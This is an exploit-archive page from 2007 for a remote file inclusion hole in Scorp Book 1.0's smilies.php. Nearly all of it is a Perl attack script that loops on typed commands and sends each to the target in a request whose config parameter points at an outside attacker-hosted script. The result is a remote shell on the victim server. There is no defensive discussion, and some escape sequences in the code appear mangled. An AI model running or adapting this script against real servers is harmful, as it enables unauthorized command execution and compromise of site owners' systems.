Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability
# Published : 2007-04-08
# Author : Dj7xpl
# Previous Title : Pathos CMS 0.92-2 (warn.php file) Remote File Inclusion Vulnerability
# Next Title : PHP-Nuke Module eBoard 1.0.7 GLOBALS[name] LFI Exploit

#!/usr/bin/perl
#                                                         .-""""""""-.                                 
#                                                        /   Dj7xpl                                 
#                                                       |              |                                
#                                                       |,  .-.  .-.  ,|                                
#                                                       | )(_o/  o_)( |                                     
#                                                       |/     /     |                                 
#                                             (@_       (_     ^^     _)                  
#                                        _     ) _________|IIIIII|__/_______________________________
#                                       (_)@8@8{}<________|-IIIIII/-|________________________________>
#                                              )_/                  / 
#                                              (@
#											   
#_______________________________________________Iranian Are The Best In World___________________________________________#
#
#
#       [~] Portal.......:  Scorp Book v1.0
#	[~] Download.....:  http://www.ectona.org/download/?id=598&s=info
#	[~] Author.......:  Dj7xpl  | Dj7xpl@yahoo.com
#       [~] Class........:  Remote File Include Exploit
#
#_______________________________________________________________________________________________________________________#
#########################################################################################################################

use IO::Socket;
if (@ARGV < 2){
print "

     +**********************************************************************+
     *                                                                      *
     *   # Scorp Book <== v1.0 (smilies.php) Remote File Include Exploit    *
     *                                                                      *
     *   # Usage   :  xpl.pl [Target] [Path]                                *
     *                                                                      *
     *   # Example :  xpl.pl Dj7xpl.ir /gb                                  *
     *                                                                      *
     *                       Vuln & Coded By Dj7xpl                         *
     +**********************************************************************+

";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];

print "n[~] Please wait ...n";

print "[~] Shell : ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.nn";
    print $socket "GET ".$path."/smilies.php?config=http://dj7xplby.ru/cmd?cmd=$cmd HTTP/1.1rn";
    print $socket "Host: ".$host."rn";
    print $socket "Accept: */*rn";
    print $socket "Connection: closernn";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[~] Shell : ";
    $cmd = <STDIN>;
	}

# www.Syue.com [2007-04-08]